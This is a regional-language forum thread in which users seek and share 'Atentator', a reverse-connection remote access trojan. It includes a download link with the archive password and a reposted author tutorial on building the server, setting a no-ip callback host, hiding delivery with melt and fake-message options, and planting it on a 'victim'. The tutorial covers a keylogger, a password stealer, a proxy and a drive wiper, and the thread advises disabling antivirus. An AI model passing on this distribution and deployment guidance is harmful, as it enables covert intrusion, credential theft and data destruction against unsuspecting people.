Prvo sam pomislio da trazis atentatora,pravog
Proguglaj malo,probaji i na download.com
Imao sam jedan program koji ni sam neznam odakle sam presnimio, sa čijeg harda... ili cedea, nemam pojma, no ja budala ga ostavio na c: i briso doze, pa ga izgubio...
Mislim da se zove Atentator i bio je beta, uglavnom napravi egsić koji staviš nekome u autorun, pošalješ mu mailom ili slično... i upališ ga i upadneš u komp kod kog je egsić... i onda mu pališ, gasiš programe, vidiš njegov desktop itd...
now ga ja više nemam.. a baš bi ga poželio opet imati, pa pliz help ako ga ima tko... da ga pošalje mailom ili posta...
Prvo sam pomislio da trazis atentatora,pravog
Proguglaj malo,probaji i na download.com
May the Force be with you!
Ako nađeš podijeli ga sa nama
mislim da tražiš ovo
Download: http://geocities.com/bvatre/atentator_v1.zip
ZIP-PASS: atentator1
ZAKOOOOOOOOOON![]()
ubuduće daj se malo potrudi u pronalaženju takvih stvari
e a jel to provjerena verzija*?* meni neće kreirati server javlja neki problem
a jel bi netko bio "duša od čovjeka" pa pojasnio nama laicima kako to radi!
i meni stalno traži neke gluposti(pasworde)!
ako treba napravit ču temu u forumu računala!
DANAS JE TEŠKO BITI GLUP,JER KONKURENCIJA JE PREVELIKA!
SJECITE BRAČO,TAKO VAM BOGA,KAD NEMAM SINA ŠTA ČE MI NOGA!!!!!!
evo tutorijala za korištenje Atentatora![]()
'................................................
'. .
'. Atentator v1.0 .
'. (Remote Administration tool) .
'. ... .
'. ..... .
'. coded by tjf .
'. ..... .
'. ... .
'. Release Date: .
'. 15.05.2005 .
'................................................
Sve sto treba da znate o ovom programu je napisano ispod, procitajte pazljivo!
Atentator je veoma lak za koriscenje.
Pre upotrebe, obezbedite sebi staticku IP adresu ukoliko je nemate, tako sto cete skinuti free program No-Ip DUC sa:
http://no-ip.com
Procitajte uputstva na tom sajtu o tome kako podesiti program i kako on uopste funkcionise.
Atentator je reverse-connection RAT sto znaci da ce se svi racunari koji budete kontrolisali, konektovati na vas racunar tako sto cete prilikom pravljenja servera (Build Server) uneti adresu koju budete dobili registracijom no-ip programa.
Atentator ne zahteva nikakve run-time
fajlove da bi se pokrenuo na NT sistemima (xp...).
Atentator nece normalno raditi na win98, server se mozda i pokrene ako su odredjeni uslovi ispunjeni ali mnoge funkcije nece raditi. Podrska za win98 ne postoji!
Instalirani Atentator server ce se pokretati sa windowsom sve dok ga vi ili zrtva ne izbrise.
Sledi step-by-step tutor o podesavanju i koriscenju Atentatora.
Kad pokrenete aplikaciju, pojavice vam se uvodni screen gde imate opcije:
-SIN
--Port Setup (ovde cete uneti Port na kom ce Atentator klijent da slusa konekcije)
--Start SIN (ovde pokrecete SIN)
--Stop SIN (ovde stopirate SIN)
-Server
--Build Server (ovde pravite server)
-Info
--About (informacije o programu)
Da biste koristili Atentator, potreban vam je Server koji cete napraviti na sledeci nacin:
Kliknite na "Build Server"..
-IP/HOST --ovde unesite adresu koju ste dobili no-ip registracijom.
-PORT --ovde unesti port na koji ce se SERVER konektovati. Default je 2176
-MELT SERVER --(opciono) ova funkcija ce uciniti da se server koji budete dostavili zrtvi izbrise nakon instalacije. Napomena: brise se samo fajl-instaler!
-FAKE MESSAGE --(opciono) pri prvom pokretanju Servera, na zrtvinom ekranu ce se pojaviti ova poruka. Iskoristite "EDIT" za konfigurisanje poruke.
-DELAY EXECUTION --(opciono) broj restarta zrtvinog racunara do otvaranja porta tj, ako unesete na primer: 2, Server ce pokusati da se konektuje na vasu adresu tek nakon sto zrtva dva puta restartuje racunar.
-BUILD SERVER -- nakon konfigurisanja, ovde pravite server.
Sada cete iskoristiti svoju mastu kako da instalirate server na zrtvinom racunaru.
Recimo da ste to odradili, konektujete se na internet, pokrenite no-ip program, pokrenite Atentator klijent, podesite port koji ste uneli pri pravljenju servera (2176) i pokrenite SIN (Start SIN).
Kad se vasa zrtva konektuje na internet, server ce se konektovati na klijent i dobicete obavestenje, mali prozor ce se pojaviti u doljnjem desnom delu vaseg ekrana i bice propracen zvucim signalom.
Primeticete da se Klijent malo 'promenio', imacete IP i Target's name u svom klijentu.
Da biste se konektovali na zrtvin racunar, potrebno je da desnim dugmetom misa kliknete na IP zrtve u prozoru Atentatora i da izaberete opciju "Connect".
Da biste se iskljucili sa zrtvinog racunara, kliknite "Disconnect" (napomena: posle odredjenog vremenskog intervala, server ce se ponovo konektovati na vas racunar!)
Da biste ugasili server i izbegli da se ponovo konektuje na vas racunar, izaberite "Close Server" opciju. (server ce se konektovati na vas racunar tek kad zrtva restartuje svoj racunar i ponovo ode na internet)
Da biste izbrisali server sa zrtvinog racunara, izaberite "Kill Server" opciju.
Nakon "Connect"...
Kad se konektujete na zrtvin racunar, otvorice vam se novi deo Aktentatora sa kojeg cete pokretati zeljene funkcije na serveru.
Atentator v1.0 ima sledece mogucnosti:
-MANAGERS
--Target's Info /ovde cete videti sve bitnije informacije vezane za zrtvin racunar
--Process Manager /kontrola procesa na zrtvinom racunaru. Napomena: neki procesi se ne mogu iskljuciti!
--File Manager /omogucava kontrolu nad fajlovima zrtvinog racunara (file size, download, upload, execute, delete, make dir, itd)
-TOOLS
--Web Downloader /omogucava vam da sa interneta na zrtvin racunar skinete zeljeni fajl, takodje da pokrenete fajl ako je executable.
--SCREEN CAPTURE /omogucava vam da uzmete sliku trenutnog ekrana zrtvinog racunara (pre pokretanja funkcije, uploadujte PLUGIN!)
--REMOTE EMAIL /omogucava slanje emaila sa zrtvinog racunara
--KEYLOGGER /Offline prisluskivanje zrtvine tastature
--PASSWORD STEALER /Omogucava vam da pokupite sifre sa zrtvinog racunara. DialUP i Protected Storage (IE).
--SOCKS4 SERVER /otvara port na zrtvinom racunaru preko kojeg se mozete konektovati na druga mesta na internetu i sakriti svoju pravu IP adresu.
--HDD KILLER /brise sve sa HDDa sem sistemske particije (!)
-DATE EVENTS
--Kill onDate /omogucava vam da pokrenete gore opisanu funkciju na odredjeni datum (napomena vazi za sve D.EVENTSe: event ce se pokrenuti na zeljeni datum ili ako taj datum prodje! Ako zrtva recimo bas taj dan ne upali racunar.)
--Download onDate /omogucava skidanje i pokretanje fajla sa interneta na odredjeni datum.
--EMail onDate /slanje emaila sa zrtvinog racunara na odredjeni datum.
--LEave onDate /brisanje servera sa zrtvinog racunara na odredjeni datum.
--Disable Events /provera i iskljucivanje prethodno zadatih event-a koji se jos nisu izvrsili.
!!!
!!!! VAZNA NAPOMENA: !!!
Posto Atentator sve radi preko jednog porta, nemojte NIKADA pokusavati da radite vise stvari od jednom jer ce doci do greske!!! Ako ste nesto pokrenuli, sacekajte da Atentator to i zavrsi pa tek onda radite dalje. Ovo ce obezbediti pravilan rad softvera.
!!!
..................................
..........................
Koriscenjem Atentatora, ni na koji nacin ne mozete ostetiti racunar niti bilo sta na njemu, pod uslovom da ne koristite "HD KILLER", "Kill onDate" i "Delete" opciju.
Atentator je napisan u edukativne svrhe i bice dalje razvijan.
Autor ovog programa nece snostiti nikakvu odgovornost za bilo kakvo koriscenje Atentatora u ilegalne svrhe.
Privatne (undetected) verzije v1.0 se mogu kupiti. Cena = 1000 din
Pisite za vise informacija.
!!! BUGS REPORT !!!
Ako naidjete na bilo kakve probleme u radu, nesto ne radi kako treba ili radi kako ne treba, posaljite mi izvestaj o gresci.
Kontakt / Podrska / Bugs Report / Pitanja / Predlozi / ... :
thief.online@gmail.com
Meni je bolji NetBus. Joj kada se sjetim tih dana provaljivanja ljudima u komp i uništavanja njihovih kompova krene mi suza na oko![]()
a dajte neke druge portove jer su svi offline
Cellmapper - crowdsource karta jačine signala mobilnih operatera
e ljudi kaj treba upisat tam IP/HOST?? kakvu adresu, nisam skužio nista...
DameWare Utilities je isto jako dobar remote-admin paketić...
Bolje cica u ruci nego Frankfurt na Majni
Moze li neko dat ponovno link za download, jer ovaj vise ne radi.
Trazio sam dosta po netu...ali samo mi nalazi atentatora na papu...
Moze li neko dat ponovno link za download, jer ovaj vise ne radi.
Trazio sam dosta po netu...ali samo mi nalazi atentatora na papu...
kolko se meni čini, i NetDevil radi isto ovo, samo možda ne na isti način......
well did you ever wake up with them bullfrogs on your mind?!
well did you ever wake up with them bullfrogs on your mind?!
Btw. pravi Atentator je Shrader.... sa njim mozes stranice kontrolirati i cak mijenjati.. Kucna racunala nisu vise U modi.....
Meni ne moze da ude ni u setup, ni u atentator.exe
Pise:
Win cannont access the specified device...
You may not have the appropriate premissions to access the item.
I avast mi stalno javlja da je naso virus
Trebam li onesposobiti antivirus??
da, trebas ga iskljucit ili stavit da ignorira taj fileIzvorno postao M.M.
Ova tema je vec bila ovdje, ali svi linkovi za skidanje su "broken"![]()
![]()
Oni iskusniji ce znati o cemu se radi, pa da ne moram puno predstavljati. Naime trazim taj program, probo sam s netdevilom i netbusom, ali po prici oni nisu ni blizu njega. Zato molim one koje to imaju neka mi samo posalju na pm, ili nek stave link za download![]()
![]()
![]()
![]()
ja ga trebam takoder ... i ja bih molio da neko neka stavi link ili mi nek posalje pm ...hvala unaprijed
Velim ti..zicer atentira![]()
2Krompirko:a da probaš na nekom poštenom warezu?tipa www.forumw.org =>možda ima
De brišite ovu temu... Šta to izvlačite iz historya... ajme...
Pogledaj kad sam ja postao... nakon toga, sam našao minimalno 5 boljih programa i mnooogo boljih načina... ajme
Bookmarks